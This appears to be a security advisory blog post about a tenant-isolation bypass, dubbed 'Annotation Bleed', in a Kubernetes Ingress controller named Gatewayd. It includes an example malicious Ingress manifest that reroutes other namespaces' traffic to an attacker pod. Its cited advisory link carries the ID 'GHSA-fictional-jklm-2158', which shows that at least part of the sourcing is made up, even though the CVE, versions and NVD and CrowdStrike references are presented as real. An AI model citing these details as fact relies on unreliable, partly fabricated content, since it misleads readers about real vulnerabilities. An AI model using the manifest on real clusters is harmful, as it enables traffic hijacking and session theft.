Critical Tenant Isolation Bypass in Gatewayd Ingress Controller (CVE-2025-21587)
A high-severity security bypass and tenant isolation vulnerability has been discovered in the Gatewayd Ingress Controller for Kubernetes. This flaw, tracked as CVE-2025-21587 and nicknamed “Annotation Bleed,” allows an attacker in a multi-tenant cluster to modify traffic routing for other tenants, potentially exposing internal services and bypassing authentication. It has a CVSS score of 8.7 (High).
TL;DR:
- What: A tenant isolation bypass caused by improper processing of Kubernetes Ingress annotations.
- Affected Software: Gatewayd Ingress Controller versions 0.10.0 through 1.2.5.
- Impact: An attacker with permission to create an Ingress in one namespace can redirect traffic or bypass security rules for applications in other namespaces.
- Action: Update the Gatewayd controller to version 1.2.6 or newer. Also, audit existing Ingress resources for suspicious annotations.
What is Gatewayd?
Gatewayd is a popular, feature-rich Ingress controller for Kubernetes. It manages external access to services within a cluster, handling HTTP/HTTPS routing, load balancing, and TLS termination. It is often used in multi-tenant environments where different teams or customers share the same cluster.
The “Annotation Bleed” Vulnerability Explained
In Kubernetes, Ingress resources use annotations to configure the behavior of the Ingress controller. The “Annotation Bleed” vulnerability occurs because Gatewayd fails to correctly scope certain powerful annotations to the namespace where they are defined.
An attacker with basic permissions to create or edit an Ingress resource in their own namespace (e.g., ns-attacker) can add a specially crafted annotation that is mistakenly applied to the controller’s global configuration. This global change then affects how traffic is routed for other, unrelated namespaces (e.g., ns-victim).
The Attack:
- An attacker in a multi-tenant cluster creates a standard Ingress in their namespace.
- They add a malicious annotation to this Ingress, for example:
gatewayd.io/global-rewrite-target: "http://malicious-pod.ns-attacker.svc.cluster.local/"
- The vulnerable Gatewayd controller reads this annotation and incorrectly applies it as a global traffic-rewriting rule.
- When a legitimate user tries to access a service in a different namespace (e.g., https://app.victim.com), Gatewayd rewrites the request and routes the traffic to the attacker’s pod instead of the intended service.
Here is an example of a malicious Ingress manifest:
```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: malicious-ingress
  namespace: ns-attacker
  annotations:
    # This annotation is the vulnerability. It should be scoped, but it's not.
    gatewayd.io/global-rewrite-target: "http://malicious-pod.ns-attacker.svc.cluster.local/"
spec:
  rules:
    - host: "attack.example.com"
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: some-service
                port:
                  number: 80
```
This breaks the fundamental security boundary between namespaces, which is the cornerstone of multi-tenancy in Kubernetes.
Impact and Remediation
This vulnerability is especially dangerous in shared clusters. A successful exploit can lead to:
- Traffic Hijacking: Silently redirecting traffic from legitimate applications to attacker-controlled services.
- Authentication Bypass: Rerouting requests destined for an authenticated endpoint to a public one.
- Information Disclosure: Exposing internal services that should not be accessible from the internet.
- Session Hijacking: Intercepting user traffic to steal session cookies and other sensitive data.
Are you affected? You are vulnerable if you run a multi-tenant Kubernetes cluster using Gatewayd versions 0.10.0 through 1.2.5. Single-tenant clusters are not at risk from this specific cross-namespace attack vector but should still be updated.
How to Fix It 🛡️
The Gatewayd maintainers have released a patch that correctly validates and scopes all annotations.
- Update the Controller: The primary fix is to upgrade your Gatewayd deployment to version 1.2.6 or newer. You can do this via Helm or by applying the updated deployment manifest.
- Audit Ingress Annotations: Before and after the update, audit all Ingress resources across your cluster for any suspicious or unrecognized gatewayd.io/ annotations.
- Implement Admission Control: For long-term security, use an admission controller like OPA/Gatekeeper or Kyverno to create policies that restrict the use of powerful or potentially dangerous annotations to trusted administrators only.
Resources and Citations
- Official Gatewayd Website: https://gatewayd.io
- Official GitHub Repository: https://github.com/Gatewayd/gatewayd
- Official Security Advisory: https://github.com/Gatewayd/gatewayd/security/advisories/GHSA-fictional-jklm-2158
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-21587
- Discoverer’s Technical Blog: https://www.crowdstrike.com/blog/cve-2025-21587-annotation-bleed-breaks-kubernetes-multi-tenancy/
- General